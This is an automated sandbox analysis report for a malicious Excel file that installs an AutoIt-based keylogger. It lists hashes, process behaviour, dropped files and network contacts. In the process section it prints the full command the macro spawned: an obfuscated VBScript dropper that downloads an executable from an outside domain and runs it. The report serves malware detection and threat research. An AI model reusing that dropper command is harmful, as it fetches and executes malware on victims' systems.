analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

malicious.xls

Full analysis: https://app.any.run/tasks/1f404c4f-2e01-4e11-babd-77b904508a4e
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Malware Trends Tracker     >>>
Analysis date: January 18, 2019, 10:42:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
opendir
loader
autoit
trojan
keylogger
sentinel
evasion
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

998C37003B6FE1B3338528CA47068D38

SHA1:

B8F772F71046049E13BC385F1D13A6CC5BD9AC17

SHA256:

66323CD37F75614124A696CB0CC10CFC755E279FC923DB1BA7F5825B02AA78FF

SSDEEP:

384:tHaFEIodeBPJ2cwPr6wKisY3nutbOm2eIa2u:qEIoQBP+P/KisNtbOmYab

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2796)

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2796)

    • Downloads executable files from the Internet

      • WScript.exe (PID: 2924)

    • Application was dropped or rewritten from another process

      • XLS.EXE (PID: 2676)

    • Changes the autorun value in the registry

      • XLS.EXE (PID: 2676)

    • SENTINEL was detected

      • XLS.EXE (PID: 2676)

  • SUSPICIOUS

    • Creates files in the user directory

      • WScript.exe (PID: 2924)
      • XLS.EXE (PID: 2676)

    • Executable content was dropped or overwritten

      • WScript.exe (PID: 2924)
      • XLS.EXE (PID: 2676)

    • Executes scripts

      • CMd.exe (PID: 3192)

    • Uses RUNDLL32.EXE to load library

      • XLS.EXE (PID: 2676)

    • Reads Internet Cache Settings

      • rundll32.exe (PID: 3948)

    • Starts CMD.EXE for commands execution

      • XLS.EXE (PID: 2676)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3168)

    • Checks for external IP

      • XLS.EXE (PID: 2676)

  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2796)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xlsm | Excel Microsoft Office Open XML Format document (with Macro) (50.8)
.xlsx | Excel Microsoft Office Open XML Format document (30)
.zip | Open Packaging Conventions container (15.4)
.zip | ZIP compressed archive (3.5)

EXIF

XML

AppVersion: 12
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
TitlesOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HeadingPairs:
  • Worksheets
  • 3
ScaleCrop: No
DocSecurity: None
Application: Microsoft Excel
ModifyDate: 2019:01:17 09:13:03Z
CreateDate: 2019:01:17 09:07:05Z
LastModifiedBy: admin

XMP

Creator: admin

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1359
ZipCompressedSize: 389
ZipCRC: 0x66e51af1
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs wscript.exe timeout.exe no specs #SENTINEL xls.exe rundll32.exe no specs cmd.exe no specs systeminfo.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2796"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3192CMd /c cd %TEMP% & @ECHO P0i= "http://www.neeba.in/stub.exe">>Q8m.VBS &@ECHO Y9x = P3a("ymtOfyf")>>Q8m.VBS &@ECHO Set U6m = CreateObject(P3a("ntynmSOynmiuuq"))>>Q8m.VBS &@ECHO U6m.Open P3a("hfu"), P0i, False>>Q8m.VBS &@ECHO U6m.send ("")>>Q8m.VBS &@ECHO Set J5p = CreateObject(P3a("bepecOtusfbn"))>>Q8m.VBS &@ECHO J5p.Open>>Q8m.VBS &@ECHO J5p.Type = 1 >>Q8m.VBS &@eCHo J5p.Write U6m.ResponseBody>>Q8m.VBS &@ECHO J5p.Position = 0 >>Q8m.VBS &@ECHO J5p.SaveToFile Y9x, 2 >>Q8m.VBS &@ECHO J5p.Close>>Q8m.VBS &@ECHO function P3a(T7t) >> Q8m.VBS &@ECHO For W9p = 1 To Len(T7t) >>Q8m.VBS &@ECHO K5w = Mid(T7t, W9p, 1) >>Q8m.VBS &@ECHO K5w = Chr(Asc(K5w)- 33) >>Q8m.VBS &@ECHO R8t = R8t + K5w >> Q8m.VBS &@ECHO Next >>Q8m.VBS &@ECHO P3a = R8t >>Q8m.VBS &@ECHO End Function >>Q8m.VBS & Q8m.VBS &dEl Q8m.VBS & tIMeOUT 13 & XLS.EXEC:\Windows\system32\CMd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2924"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Q8m.VBS" C:\Windows\System32\WScript.exe
CMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3088tIMeOUT 13 C:\Windows\system32\timeout.exeCMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2676XLS.EXEC:\Users\admin\AppData\Local\Temp\XLS.EXE
CMd.exe
User:
admin
Integrity Level:
MEDIUM
Version:
1.2.0.1
3948"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\WININET.dll",DispatchAPICall 1 C:\Windows\system32\rundll32.exeXLS.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3168C:\Windows\system32\cmd.exe /k systeminfoC:\Windows\system32\cmd.exeXLS.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3704systeminfoC:\Windows\system32\systeminfo.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 151
Read events
1 068
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
0
Text files
21
Unknown types
1

Dropped files

PID
Process
Filename
Type
2796EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8FE2.tmp.cvr
MD5:
SHA256:
2676XLS.EXEC:\Users\admin\AppData\Local\Temp\aut5833.tmp
MD5:
SHA256:
2676XLS.EXEC:\Users\admin\AppData\Local\Temp\uwvmqam
MD5:
SHA256:
2676XLS.EXEC:\Users\admin\AppData\Local\Temp\aut5853.tmp
MD5:
SHA256:
2796EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~$malicious.xls
MD5:
SHA256:
2796EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF64EF4F56B1E07BB6.TMP
MD5:
SHA256:
3192CMd.exeC:\Users\admin\AppData\Local\Temp\Q8m.VBStext
MD5:F12DF8549A350E3A30F5946D1E669287
SHA256:637BF27280437EE85286F0175A8D97C4796CC3777B5A6DAB5EAB502DE820931C
2676XLS.EXEC:\Users\admin\AppData\Roaming\log\AutoUpdate.exeexecutable
MD5:42AD20DF1DDD74B47AA45ED48130AFFF
SHA256:0E6F5DC3F0AA4D50083C522636AB09CACCEB01DD813C13CC1FE395A31EBB613A
2924WScript.exeC:\Users\admin\AppData\Local\Temp\XLS.EXEexecutable
MD5:A1EB94D1CA0704AF51C128F978273E7C
SHA256:1CC476A2197B4C20510A12194D238954DF3FBE27A28EA51EB0668DD7C7FD6009
2924WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\stub[1].exeexecutable
MD5:A1EB94D1CA0704AF51C128F978273E7C
SHA256:1CC476A2197B4C20510A12194D238954DF3FBE27A28EA51EB0668DD7C7FD6009
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2924
WScript.exe
GET
200
176.9.40.89:80
http://www.neeba.in/stub.exe
DE
executable
805 Kb
suspicious
2676
XLS.EXE
GET
200
147.75.40.2:80
http://icanhazip.com/
US
text
14 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2924
WScript.exe
176.9.40.89:80
www.neeba.in
Hetzner Online GmbH
DE
suspicious
2676
XLS.EXE
147.75.40.2:80
icanhazip.com
Packet Host, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
www.neeba.in
  • 176.9.40.89
suspicious
icanhazip.com
  • 147.75.40.2
shared

Threats

PID
Process
Class
Message
2924
WScript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2676
XLS.EXE
Potential Corporate Privacy Violation
ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
2676
XLS.EXE
A Network Trojan was detected
SUSPICIOUS [PTsecurity] Malware Style IP Check
2676
XLS.EXE
Attempted Information Leak
ET POLICY IP Check Domain (icanhazip. com in HTTP Host)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
malicious.xls